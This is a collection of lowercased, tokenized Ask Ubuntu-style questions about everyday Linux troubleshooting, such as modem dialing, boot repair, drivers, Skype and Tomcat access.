/dev/tty15 /dev/tty30 /dev/tty46 /dev/tty61 /dev/ttys18 /dev/ttys5 /dev/tty16 /dev/tty31 /dev/tty47 /dev/tty62 /dev/ttys19 /dev/ttys6 /dev/tty17 /dev/tty32 /dev/tty48 /dev/tty63 /dev/ttys2 /dev/ttys7 /dev/tty18 /dev/tty33 /dev/tty49 /dev/tty7 /dev/ttys20 /dev/ttys8 /dev/tty19 /dev/tty34 /dev/tty5 /dev/tty8 /dev/ttys21 /dev/ttys9 /dev/tty2 /dev/tty35 /dev/tty50 /dev/tty9 /dev/ttys22 /dev/ttyusb0 /dev/tty20 /dev/tty36 /dev/tty51 /dev/ttyprintk /dev/ttys23 /dev/ttyusb1 /dev/tty21 /dev/tty37 /dev/tty52 /dev/ttys0 /dev/ttys24 /dev/tty22 /dev/tty38 /dev/tty53 /dev/ttys1 /dev/ttys25 raj @ raj-system-home : ~ $ dmesg | tail [ 186.644609 ] usb_serial_simple 3-1:1.1 : device disconnected [ 217.256035 ] usb 3-1 : new full-speed usb device number 4 using uhci_hcd [ 222.478925 ] usb 3-1 : new usb device found , idvendor=05c6 , idproduct=3197 [ 222.478933 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 222.478938 ] usb 3-1 : product : qualcomm cdma technologies msm [ 222.478943 ] usb 3-1 : manufacturer : qualcomm , incorporated [ 222.484989 ] usb_serial_simple 3-1:1.0 : moto_modem converter detected [ 222.485122 ] usb 3-1 : moto_modem converter now attached to ttyusb0 [ 222.486961 ] usb_serial_simple 3-1:1.1 : moto_modem converter detected [ 222.487083 ] usb 3-1 : moto_modem converter now attached to ttyusb1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - raj @ raj-system-product-name : ~ $ sudo gedit /etc/wvdial.conf [ dialer defaults ] modem = /dev/ttyusb0 baud = 115200 init1 = atz init2 = atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 init3 = area code = phone = # 777 username = 427xxxxxxx password = 427xxxxxxx ask password = 0 dial command = atdt stupid mode = 1 compuserve = 0 force address = idle seconds = 0 dialmessage1 = dialmessage2 = isdn = 0 auto dns = 1 i tried modem= both ttyusb0 and ttyusb1 , but no use . raj @ raj-system-product-name : ~ $ sudo wvdialconf editing `/etc/wvdial.conf ' . scanning your serial ports for a modem . modem port scan < *1 > : s0 s1 s2 s3 s4 s5 s6 s7 modem port scan < *1 > : s8 s9 s10 s11 s12 s13 s14 s15 modem port scan < *1 > : s16 s17 s18 s19 s20 s21 s22 s23 modem port scan < *1 > : s24 s25 s26 s27 s28 s29 s30 s31 wvmodem < *1 > : can not get information for serial port . ttyusb0 < *1 > : atq0 v1 e1 -- failed with 2400 baud , next try : 9600 baud ttyusb0 < *1 > : atq0 v1 e1 -- failed with 9600 baud , next try : 9600 baud ttyusb0 < *1 > : atq0 v1 e1 -- and failed too at 115200 , giving up . wvmodem < *1 > : can not get information for serial port . ttyusb1 < *1 > : atq0 v1 e1 -- failed with 2400 baud , next try : 9600 baud ttyusb1 < *1 > : atq0 v1 e1 -- failed with 9600 baud , next try : 9600 baud ttyusb1 < *1 > : atq0 v1 e1 -- and failed too at 115200 , giving up . sorry , no modem was detected ! is it in use by another program ? did you configure it properly with setserial ? please read the faq at http : //alumnit.ca/wiki/ ? wvdial raj @ raj-system-product-name : ~ $ sudo wvdial -- > wvdial : internet dialer version 1.61 -- > can not get information for serial port . -- > initializing modem . -- > sending : atz -- > sending : atq0 -- > re-sending : atz -- > modem not responding . in gnome ppp setup , i selected device at /dev/ttyusb0 and clicked 'detect ' . i get the message 'no modem was found on your system . ' connection log : -- > wvdial : internet dialer version 1.61 -- > can not open /dev/ttyusb0 : permission denied -- > can not open /dev/ttyusb0 : permission denied -- > can not open /dev/ttyusb0 : permission denied
506216	windows not booting after boot-repair	my laptop had ubuntu pre-installed in it . i installed windows 7 from usb by following the steps from how can i install windows after i 've installed ubuntu ? windows booted fine before i ran boot-repair . however , after i installed and ran the boot-repair from the ubuntu live cd , windows has stopped booting . just a blank screen appears and nothing happens . what to do ? thanks in advance .
506220	network drivers for hp compaq	i did not find network dirver for hp compaq dc79000 small from factor driver : intel 82567 lm-3 gigabit
506221	speeding up boot time	i 'm setting up a pc in the living room for steam big picture ( a `` media center '' version of steam , which can also stream videogames from another computer on the local network ) . all the computer has to do is to boot up , log in into the default user and launch steam . being a media center , i need it to boot fast . with the default configuration it took 1:46 m from the press of the power button to steam . i 've tried to optimize some things . here 's what i 've already done : installed the preload package installed the readahead-fedora package changed concurrency=makefile into concurrency=shell in /etc/init.d/rc ( read the edit below ) reduced grub_timeout to 0 disabled some unnecessary services with the rcconf command with these tweaks i 've achieved about 20-25 seconds of speed up , but it 's still not so good . how can i figure out what does it exactly do in the ~65 seconds between the post and gnome3 ? edit : apparently the /etc/init.d/rc script changes shell back into makefile , they are the same thing but the first one is deprecated .
506222	how to install oracle in ubuntu 32 bit	i need the download link of oracle for ubuntu 32 bit and instruction how to install it ... .please help
506226	when i am typing greek in netbeans 8 , tones do not work over letters	for example i can type `` γεια σου '' but not `` γειά σου '' . the `` α '' is missing the tone `` ά '' on it . it should be γειά not γεια . each time i need to type the word in netbeans 8 , i have to open libre office , write it there and then paste it in the ide in order to have a tone over the letter . i have no problems in libre office or the browser . i am using netbeans 8 on ubuntu 12.04 . what do you suggest for a fix ?
506231	dump gtk2 elements to png	i want do dump every gtk2 element in single png files . so that i can analyze them for creating gtk3 themes . this questions is only about the way how to dump every element like buttons scrollbars etc to single png files , not more ! ! the other converting process is done by another script . regards bluedxca93 i did now managed to grab non hover states with scripts like these : example : inactiveb is a file containing : sleep 1 ; import -window `` inactivecheckradio '' inactivecheckradio.png ; wmctrl -c inactivecheckradio printinactivecheckbutton ./analyzecheckradio & ./inactiveb analyzecheckradio is a program that shows the radio buttons ( either pygtk or c/glade ) . how do i print the hovered states to disk ? . something like xdotool or xmacroplay + sleep is anoing when window decorator changes or theme has highly another widths . regrads bluedxca93
506236	skype `` ca n't connect '' on ubuntu 13.10	i am running ubuntu 13.10 32bit . since a couple of days skype does n't work anymore : `` skype ca n't connect '' . it is skype version 4.2 . i know there have been other posts regarding this problem . here it is suggested to update to skype 4.3 using the software center . i tried this but as far as i can see it the skype version on the software center is still 4.2 . i tried ot anyway , that is , i first uninstalled then reinstalled skype via the siftware center . but as expected it is still version 4.2 . and there it still does not work . also i checked this site ... but they do not have a version for ubuntu 13.10 . for some reasons i would not like to update ubuntu to v 14.04 at this point so i would be happy if someone came up with a solution how to fix this problem on ubuntu 13.10 .
506237	how to run the ubuntu window manager in a window on another system	let me call the ubuntu system `` the server '' ( runs gnome ) and the x server `` the terminal '' ( which uses tom 's window manager ) . i can run the command gnome-session on the server through a ssh tunnel from the terminal , but that makes the server control the entire real estate of the terminal . what i wish to do is to run the server 's window manager in a window on the terminal . a method to run another instance of the server 's window manager in a server window will also achieve the desired result ( as i can run that window through a ssh tunnel ) . another way to put this question is , how to run the window manager of a headless system in a window of another x11 server .
506238	how to build dependency list for deb package	i want to pack my qt application to deb . during investigation dependencies with ldd i got ~50 libraries . full list below : libgstreamer-plugins-base0.10-0 , libgstreamer0.10-0 , libglib2.0-0 , libasound2 , liboss4-salsa-asound2 , libssl1.0.0 , libx11-xcb1 , libxi6 , libxcb-render-util0 , libsm6 , libice6 libxcb1 , libxcb-glx0 , libxcb-render0 , libxcb-image0 , libxcb-icccm4 , libxcb-sync1 , libxcb-xfixes0 , libxcb-shm0 , libxcb-randr0 , libxcb-shape0 , libxcb-keysyms1 , libxcb-xkb1 , libxcb-dri2-0 , libxcb-present0 , libfontconfig1 , libfreetype6 , libxrender1 , libx11-6 , libjpeg-turbo8 , libpng12-0 , zlib1g , libglib2.0-0 , libgl1-mesa-glx , libstdc++6 , libgcc1 , libc6 , liborc-0.4-0 , libglib2.0-0 , libxml2 , libffi6 , libxext6 , libuuid1 , libxau6 , libxdmcp6 , libxcb-util0 , libexpat1 , libpcre3 , libglapi-mesa , libxdamage1 , libxfixes3 , libxshmfence1 , libxxf86vm1 , libdrm2 , liblzma5 i want to minimize this list , based on assumption that there is dependency between some lib and each other in this list . my questions : which tool can help me to minimize ? which dependencies from list above are pre-installed for ubuntu ?
506240	make a grid of images , then rotate and crop it	so i have a few thousand thumbnails that i want to stitch together in a slightly tilted grid . i figure that 's not going to be the most obvious thing in the world to understand so here 's an artists impression of the final output , sans images . i 've been using imagemagick so far to create the 17ă8 grid . it 's simple enough but here 's a version with the rose dummy image that will display to screen : montage -mode concatenate $ ( printf 'rose : % .0s ' { 1..136 } ) -resize 100x80 -tile 17x out.jpg but now i want to rotate and crop . if i chuck -rotate 1.5 , each image is rotated separately . if i save it and then rotate i compound compression artefacts and lose quality . how do i rotate and crop this grid in the same command ? i 'll happily take an alternative to imagemagick but this has to be command-line as it 's going to run on a regular basis on a server .
506242	linux 14.04 iso package installation not working . not able to log in with windows 7	i tried to install ubuntu 14.04 iso inside my windows machine . so i downloaded iso in the usb and extracted the iso image using universal usb installer and booted the machine with usb storage device option but after that now i am not able to log in inside windows . error message : syslinux 4.07 edd 2013-07-25 copyright ( c ) 1994-2013 h. peter anvin et al error : no configuration file found no default or ui configuration directive found ! boot :
506243	mysql strange installations problems	my problem is really strange , cause i tryied lots of ways to solve them but noone was working . my last output was : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` pl_pl.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up mysql-server-5.5 ( 5.5.38-0ubuntu0.14.04.1 ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory /var/lib/dpkg/info/mysql-server-5.5.postinst : line 146 : logger : command not found attention : an error has occured . more info is in the syslog ! /var/lib/dpkg/info/mysql-server-5.5.postinst : line 236 : logger : command not found dpkg : error processing package mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 127 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing package mysql-server ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i really do n't know how to fix that , guys please help me : )
506244	is there a system-wide spell check setting ?	i just reinstalled ubuntu on a new hard drive , and now i have to disable spell checking in just about every application . can i do that for the whole system ?
506247	power levels not working	i 'm running ubuntu 14.04.1 on an hp elitebook 2540p . the battery level does n't seem to work amazingly , and will gradually decrease down to around 30 % , and then will suddenly drop to around 1 % , and ask to be plugged in ?
506249	ubuntu wo n't mount sd card	i have asus x552v with ubuntu 14.04 64b . i tried inserting 4gb transcend sd card into card reader , but nothing happens . as i was directed to why does ubuntu not detect my sd card ? this question , i tried doing what it said , but nothing changed . then i tried doing sudo fdisk -l and the output was : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x2bfb4dc8 device boot start end blocks id system /dev/sda1 * 2046 261904383 130951169 5 extended partition 1 does not start on physical sector boundary . /dev/sda2 261904384 1129629695 433862656 7 hpfs/ntfs/exfat /dev/sda5 2048 58593279 29295616 83 linux /dev/sda6 58595328 253904895 97654784 83 linux /dev/sda7 253906944 261904383 3998720 82 linux swap / solaris disk /dev/mmcblk0 : 1973.2 gb , 1973231288320 bytes 82 heads , 17 sectors/track , 2764682 cylinders , total 3853967360 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/mmcblk0p1 8192 7811071 3901440 b w95 fat32 so obviously , i can see my sd card here , but it seems strange to me that disk identifier is 0x00000000 , and that it took about 2 minutes to get this information . is it a ubuntu bug , or could it be a sd card issue ? update : i tried the same sd card with my other laptop also running ubuntu 14.04 and it works with no problem . when i run gparted with sd card inside , it will never scan all drives , but it will when i remove it . blkid also runs forever with sd card inserted
506255	encrypted drive ( full disk encryption ) gone after upgrade to 14.04	i 'm in a bit of a pickle . i have just done an upgrade from 13.10 to 14.04 , then i rebooted the machine and now the drive/partition is gone , so it boots into memtest . the drive was encrypted during installation ( 13.04 ) using full disk encryption . the update to 13.10 went without issues . if i use a liveusb i can mount the drive just fine , so i assume it 's a grub problem , but i ca n't really figure out what 's wrong . does anyone know a way to make the disk visible again from a liveusb ? the computer is a lenovo x1 carbon , so the ssd is non-removable ( the ssd is visible in the bios ) .
506256	multi boot win xp pro 32 bit , win 7 pro 64 bit , ubuntu 14.04 64 bit	i 'm a complete novice to linux , so step by step instructions for me would be greatly appreciated . as the header states i 'm attempting to setup those 3 os 's specifically with multi-boot . i 've used paragon to setup 3 primary partitions on a 1t drive . 2 partitions are set to 200 gb and the remaining drive is set to the balance of space on the drive . one of the 200 gb drives will be used for ubuntu . i 've done some reading on multi-boot here and in other places , but frankly i find it convoluted and certainly nothing advising of my specific o/s strategy . my reading advises me to setup any windows os first then setup ubuntu as the final install , but everywhere i read people have had nightmares with the boot loader . i keep reading about grub 2 and i have no idea what grub 1 or 2 is or how to initialize it or use it or what its purpose is . ( i know you 're going to tell me to read up on it , but as you know , reading up it will lead to more questions and more reading and i 'll never get to actually installing the os 's ) . so bottom line is i have two questions : am i better off using a 3rd party boot manager for all 3 os 's ? are there easy step by step instructions for multi-boot systems for the strategy i have described ?
506259	skype shows `` virtual device '' for microphone , speakers and ringing	i have ubuntu 14.04.1 and skype 4.03.0.37. my audio devices are working fine but when i make skype calls i ca n't hear the other person neither they can hear me . when i checked skype audio settings it showed virtual device as the only option for all devices . i tried a lot of proposed solutions on the web and nothing helped . what could be the problem and how can i fix it ? i know there is not a lot of details in the question to help , what extra details do i need to provide ? thank you so much .
506260	windows have black borders after hibernation unity	when my 64bit ubuntu 14.04 machine `` wakes up '' after hibernation , windows look like this : http : //imgur.com/a/9e6xa ( sorry for inconvenience , but board restrictions wo n't let me post photos ) the system is still usable , but it 's really ugly and i believe that linux is beautiful , not only because of its command line , but also because of its gui . so there must be a solution for this . i am using a samsung r780 laptop , nvidia geforce gt 330m graphics card , intelâž coreâ˘ i7 cpu m 620 . i have a separate swap partition set up and i 'm running the x.org server with unity 7.2.0 on top . i 'm using the evil ; ) nvidia proprietary driver version 331.38 , because open drivers do n't work for me . do you need any additional information ? when i restart the x-server and display manager , everything works fine again . i did n't find anything on the web and i do n't have a clue what could possibly cause this problem , so i 'm very thankful for any help . thank you in advance schrankwand55
506261	startup script for brightness	not so long ago i replaced xp for lubuntu 14.04 on a old pc , and it works great . to make it perfect , i want to autoexecute `` xrandr -- output vga-1 -- gamma 3:3:3 -- brightness 1 '' on startup or boot . thereby not having to do it manual ... ... ... ... everytime . using the internet , i was thinking of using the following : vi file.sh cp file.sh /xrandr -- output vga-1 -- gamma 3:3:3 -- brightness 1/init.d/file.sh chmod +x /xrandr -- output vga-1 -- gamma 3:3:3 -- brightness 1/init.d/file.sh sudo update-rc.d file.sh start 99 2 . sudo update-rc.d -f file.sh remove but at the second commandline i receive the error : `` e486 pattern not found '' . what am i doing wrong ? thank you in advance .
506263	linux driver for the epson style office bx305f printer/scanner ?	i have not been able to print or scan with my epson style office bx305f on ubuntu . i 've tried adding a printer and using simple scan but neither work .
506266	powershell for ubuntu	friends i have been assigned a project to be done in windows power-shell.i am familiar with shell scripting but its a new technology .i was told that its similar to shell except few syntax changes . i have 1 week time to learn and understand the basics . i tried looking for an emulator but could n't find.i do n't have a dual system on my laptop.help me out here . do i need to install windows on my laptop so that i could practice those commands at home or there is a solution available in ubuntu without making changes to my operating system . help me out , its urgent . thanks .
506269	okular opens large pdfs with blank pages	i ca n't open large files ( above 10mb ) with okular . this is a problem with files i save and open up in dolphin and files i open directly in firefox ( i.e.e-books ) . symptoms : -pdf opens but is blank or pdf opens but most pages are blank . -cpu starts working way too hard -problem continues regardless of how i save file the contents of pdf file show when i import it into my reference manager mendeley ( or on other os ) . any suggestions would be appreciated . mendeley has limited space . i just updated kde desktop to 4.12 as this was suggested somewhere , and it made no difference . thanks ! kubuntu newbee
506271	unable to run script using `` startup applications '' option in ubuntu 14.04	i am trying to run following script to run my rails application on startup but unable to execute . run_my_app.sh # ! /bin/bash cd /home/ < user > / < my_rails_app > & & rails server run_my_app.sh has full permissions by running chmod a+x run_my_app.sh after doing above , i am adding path to the script to `` startup application '' command option . when i restart virtual machine the script seems not working because it should run rails application on localhost:3000 but it did n't . so my question is how to debug what is wrong ? how to debug what is wrong ? what is better approach to start the application on start up or when user logs in ? i tried to put the command in ~/profile and ~/rc.local but neither did help .
506272	unity 2d dash and launcher unable to install !	ok . i tried installing ubuntu tv from this page . it said that my ubuntu 2d environment will be altered . now when i choose ubuntu 2d , i dont have a launcher . everything is working except there is no launcher . i can open the terminal and launch apps from there but i want the launcher . i thought that there must be something wrong . when i searched the software center i found that there was a file called dash and launcher for ubuntu 2d . i tried to install it but it showed the following error package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time and the details of the error : he following packages have unmet dependencies : unity-2d-shell : i386 : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqt4-dbus ( > = 4:4.5.3 ) but 4:4.8.1-0ubuntu4.8 is to be installed depends : libqt4-declarative ( > = 4:4.7.0~rc1 ) but 4:4.8.1-0ubuntu4.8 is to be installed depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.8 is to be installed depends : libqtgui4 ( > = 4:4.6.1 ) but 4:4.8.1-0ubuntu4.8 is to be installed depends : libunity-2d-private0 ( = 6.10.06.u2t16+1122~precise1 ) but 6.10.06.u2t16+1122~precise1 is to be installed depends : unity-2d-common ( = 6.10.06.u2t16+1122~precise1 ) but 6.10.06.u2t16+1122~precise1 is to be installed can anyone help me to either get back unity 2d or get ubuntu tv . i have already tried sudo apt-get -f install thank you
506273	how to adjust top menu bar size ?	i accidentally clicked something that enlarged the top menu bar . i have no idea how i did this but just want to change it back . picture included below :
506274	connecting 14.04 to lg tv	i just exchanged windows 7 out for ubuntu 14.04 . bit of a n00b i connect my laptop with a hdmi cable to my lg 42 '' hd-ready ( not full hd ) tv , and previously with windows that always worked fine . so i assume its not a problem with the hardware . now i cant seem to get it to work . the tv registers that something is connected to it , but gets no signal . the computer detects the tv as `` goldstar company ltd. 72 '' , allows me to mess with its settings but as i say , no setting has worked so that i get an image to my screen . would anyone be so kind as to help me out with this ?
506276	is it possible that i deleted my files while trying to delete a symbolic link ?	i made a symbolic link that points to a 500gb ntfs drive , when i executed the second command it halted for 3 seconds so i terminated it , i have a lot of files on the drive im not sure if it deleted anything root @ myhost : /home/myuser/desktop # rm /media/d/ rm : can not remove â/media/d/â : is a directory root @ myhost : /home/myuser/desktop # rm /media/d/ -r ^c
506278	my computer lags when playing 3d games ( nvidia geforce 4 mx420 )	hello when i try to play 3d games on my computer like tux racer and other games it lags really bad . when i look in additional drivers it does n't detect new drivers for my machine . i 'm running lubuntu 14.04 and my graphics card is nividia mx 420 my proccessor is a amd athlon xp + 2000 1.66 ghz . so why is my computer lagging ? . thank you for reading this
506281	what actually does a release upgrade do ?	i see several questions about problems during release upgrade have been posted but mine is more basic . i have a ubuntu 13.10 which i installed lxde on . i fear now if i upgrade that all my modifications and maybe even things like fstab etc will be overwritten and i lose all and also some of my applications ? what actually does a release upgrade do ? i do n't find explanations just everywhere it says `` how to do it '' .
506282	is viewing system files like `` /sbin/init '' safe ?	do i risk breaking my installation of ubuntu if i view /sbin/init without editing it , say , in gedit ? ( i 'm taking an online linux course and they mention this and i wanted to see what it looks like . )
506283	lubuntu 14.04 - cairo-dock missfunctions	i have a fresh installation of lubuntu 14.04 on my acer aspireone netbook and i wanted to add a dock to it . i decided to use cairo-dock since i use the exact same dock on my ubuntu laptop . the thing is that i am experiencing a weird mulfunction , as shown in the next figure you can see that when there is a window open , hovering to make the dock pop-up , makes the desktop to appear . how can this be fixed ?
506290	can not access to tomcat7 manager application	i 've installed tomcat7 via synaptic but can not access manager application . what am i doing wrong or what is missing , i can not figure out . my complete settings and o/p are listed below : when i do http : //127.0.0.1:8080/manager/html , it shows 403 access denied.you are not authorized to view this page ... my os is ubuntu 14.04 **java -version** java version `` 1.7.0_55 '' openjdk runtime environment ( icedtea 2.4.7 ) ( 7u55-2.4.7-1ubuntu1 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode ) the o/p of the command : /var/lib/tomcat7/webapps $ ls manager root the o/p of the command shows : ls -l /var/lib/tomcat7/webapps/ total 4 lrwxrwxrwx 1 root root 32 aug 3 18:31 manager - > /usr/share/tomcat7-admin/manager drwxr-xr-x 3 root root 4096 aug 3 10:42 root and i 've set /etc/environment as : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games '' catalina_home= '' /var/lib/tomcat7 '' cataline_base= '' /var/lib/tomcat7 '' java_home= '' /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java '' tomcat-users.xml file < tomcat-users > < role rolename= '' tomcat '' / > < role rolename= '' role1 '' / > < user username= '' tomcat '' password= '' tomcat '' roles= '' tomcat '' / > < /tomcat-users > please can anyone explain what is missing or what is going wrong with this ? thanks ! ! !
506294	ca n't see desktop except for background when log in ubuntu14.04	i need some help , i installed ubuntu 14.04 from 12.04 . i had some problems when it rebooted so i had to install unity using sudo apt-get install ubuntu-desktop and continue tu update all packages using the virtual console . ctr + alt + f1 . but when i tried to login , after entering my user and password nothing loads , no dash , no launcher , etc . i tried everything but most i find is for older versions so i need help with this version or how to install a gnome panel to replace unity and set it as defaul . using ccsm show the unity plugin checked . p.d . : i 'm using an acer aspire 4520 with and nvidia card .
506297	can not fix grub after running boot repair	any help is appreciated . i 've been trying to fix this for a couple days now . trying to dual boot win8 and ubuntu on an hp envy ( 15-j1063cl ) . whenever i boot my computer i get the `` grub rescue '' screen . i can boot to either ubuntu or windows 8 by booting the right .efi file from the boot options menu . i 've run boot repair multiple times , but i still ca n't get past this screen . i would like to use refind , and i 've tried installing that as well . output of boot repair : http : //paste.ubuntu.com/7942689/
506303	i 'm missing a windows drive - how to recover disk space ?	i had installed windows xp on c : \ drive then install ubuntu on d : \ drive . after that i had formatted the c : \ drive and reinstalled window xp on c : . however , now i can not find my ubuntu and also its disk space . i need my d : \ drive space , how can i find it ?
506304	ubuntu 12.04 lts drains battery overnight during hibernation	i have 12.04 current installed on my laptop . first thing , the wifi gets hard blocked when enters suspend . this kept me away from ubuntu . well , this is n't the matter right now . i started using the hibernation as it kept my wifi alive but i 've noticed that my battery drains a lot faster than suspend while on hibernation . it drained overnight and i saw it in sleep mode when i woke up . it bugs me a lot , so any solutions ? ? ? ? edit : i found out it does n't hibernate at all . it just keeps running .
506307	connecting to a remote server for the first time	i 'd like to know how to connect to a remote ubuntu 12.04lts os server . i 've never done this , and wondered if anyone would be willing to help a noob out ; i 'd appreciate it ! i 've always wanted to be able to connect to a remote machine via the terminal and even more so something that i can use to access the server in a window on my current machine ( like it 's own desktop ) . again , first timer , be gentle . thanks/best .
506310	bittorrent clients ubuntu 14.04.1 lts 32bit	i 'm fairly new to ubuntu ( read - noob ) and am finding it very difficult to determine if there is a bt client with the `` remove torrent , remove + delete torrent , remove + delete torrent + data '' options that were so handy in utorrent . all i 've been able to find is people complaining about the lack of these options ( qbittorrent , deluge , transmission , etc. ) . i would appreciate the ability to remove some files from the torrent list while still keeping them on my pc , while also having the option to delete others completely . so , my question is this : are there any linux bt clients with the utorrent remove/delete options ? ps , if there are n't any like utorrent , is there another way to accomplish these tasks ? thanks in advance for any and all help/input on this matter .
506317	ca n't boot on windows 8 , with triple boot	for the second time , ubuntu replace , again , my windows 8 . ubuntu replace the boot of windows 8 with his evil grub , so i ca n't boot in windows 8 . when i try to boot in windows 8 , he reload grub . : @ so i have a triple boot , with mac osx , ubuntu 14.04 , and windows 8 . i ca n't boot in ubuntu since upgrade of ubuntu ( 13 to 14 ) . so i ca n't use my windows . thanks ubuntu again . : @ i have already use boot repair , reinstall grub . i use refit to boot in mac or ubuntu or windows 8 , but since the update , refit show me : mac osx , ubuntu , and ubuntu again . and when i choose windows in grub , he reload grub . there is a past of boot repair : http : //paste.ubuntu.com/7943200/ thanks for your help , and sorry for my bad english , i 'm french . : )
506318	no wifi/internet after suspend	i have literally tried everything on the internet but nothing helped me . the wifi gets hard blocked after suspend . even rfkill command wo n't work . any help please ?
506322	ca n't enter bios settings after installing ubuntu ( samsung np300e5s )	i 've samsung ( np300e5s-01in ) laptop , i installed ubuntu 14.04 lts on it and now i want to install windows 8.1 on another partition but whenever i press `` f2 '' key to enter bios settings . it brings me to the black screen and there are 2 options ( 1 ) ubuntu ( 2 ) advanced options for ubuntu it was working fine before i installed ubuntu.. also i ca n't boot from cd/dvd or usb . someone help me please . : (
506324	installed google chrome , but it wo n't launch in a `` guest session . ''	trusty tahr 14.04.1 , 64-bit edition ( though i see the same behavior in precise ) . i installed the latest google chrome under my session , and it works fine . however , if i open a `` guest '' session , the icon appears in the hud , but it wo n't launch . i also have seamonkey installed ( via ubuntuzilla ) and that launches just fine in the guest session . why wo n't chrome ?
506327	is it better to use the uk or usa server ?	i live in the uk , so it should be better to use the uk ones . but , the usa one is more likely to be well maintained and have the better connection speed . which should i use - is there a testing tool , either built in or installable ? i , personally , would prefer a gui method over command line .
506337	lubuntu 14.04 tired about suspend e hibernation `` power manager not authorized ''	below the post , last configuration i used , it seems works well . i 've lubuntu 14.04 installed on my netbook ( aspire one ao-532h ) . i am using it like a desktop with external display and input devices . after some errors i 've recently reinstalled lubuntu ( before , i 've also deleted all . * files and directories in my home directory and formatted the root partition ) . one of these errors was the system 's inability to go in suspend mode automatically . this despite xcfe4-power-manager-settings being set to do so . there were no problems when suspending manually . after installation , it seems that the xcfe4 power manager setting icon is not loaded at startup anymore . despite this suspend mode seems to work well ( after some minutes not using the system , it suspended automatically ) . i tought that the time was set in xcfe4-power-manager ( despite it not being visible ) . after installing a few applications ( lyx , netbeans with jdk.. ) and changing monitor settings ( only the external vga enabled with the netbook display turned off ) the issue described previously has reappeared : the monitor goes into suspend and then switches off correctly . but waiting the 15 minutes ( i do n't understand why i ca n't set a time to go in suspend/hibernate mode shorter than 15 minutes ) ** the system remains on . when disabling the screensaver the message `` power manager not authorized '' appears . ** any suggestions ? i 've looked for info about this message balloon ( `` power manager not authorized '' ) and i 've done some changes ( but not solved the problem ) : i am able to 1 ) run xcfe4-power-manager and its settings icon at startup in these ( alternative ) methods : - changing to laptomop mode yes in preferences- > lxsession predefined app - adding a line in startup application xcfe4-power-manager -- no-daemon 2 ) enabled hibernate option adding a file with name /etc/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla and contents : [ re-enable hibernate by default in upower ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes [ re-enable hibernate by default in logind ] identity=unix-user : * action=org.freedesktop.login1.hibernate resultactive=yes configuration that works well : my configuration : i 've installed also : gnome-power-manager , but after i uninstalled it . xcfe4-power-manager-plugin package i 've enabled hibernate modality , with policy file describe up . in system preferences/disk/device setting : stand-by after 9:20 min** ; ** apm on,255 xcfe4-power-manager-settings prescribes : in general tab- > '' check screen enrgy option '' disabled ; ac ( equal for battery ) tab- > sleep pc after 15 min / screen sleep 2 min switch off 3 min extended tab- > pc sleep modality suspend ( works well also hibernate ) ; monitor suspend ; lock screen if start hibernate or suspend modality enabled in preferences apps..lxsessions/autostart- > power manager**/screensaver/screen lock **all enabled apps..lxsessions/settings- > laptop mode yes apps..lxsessions/core application- > power manager : auto ; lock screen manager : blank ; screensaver : lxlock
506338	touchpad not working on ubuntu 14.04	i am using dell inspiron 15r 5521 laptop . it had ubuntu 12.04 installed at time of purchase . everything was working fine.then i installed windows in it and now i have removed windows and installed ubuntu 14.04 . the problem i am facing is that my touchpad is not detected in it . i searched on google , askubuntu but could not get solution to my problem . also i went through this link ( https : //help.ubuntu.com/community/synapticstouchpad ) but it did not help . can you please help me here . let me know what other information is required here . thanks .
506339	scroll up the page to previous input on terminal	sometimes it would be convenient to be able to scroll back to the output of the previous command in the terminal , especially if the output is extremely long . is there a way to do this ? edit : let me clarify that a little more . i am not asking how to get the previous commands behind my cursor - i am aware that that can be done by pressing the `` up '' button . i want to scroll up the whole `` page '' of the terminal to where my previous command has been imputted . motive : in the work that i am doing , sometimes the output of a certain command is so large , that it becomes very challenging to find the first few lines of the output . by large i mean so large that scrolling by keys is too slow , and scrolling with mouse via scrollbar just misses the right line each time because its too fast .
506341	ubuntu 14.04 drivers for magicjack	does magicjack work on ubuntu 14.04 ? can i download and install drivers to operate magicjack on the ubuntu 14.04 operating system ?
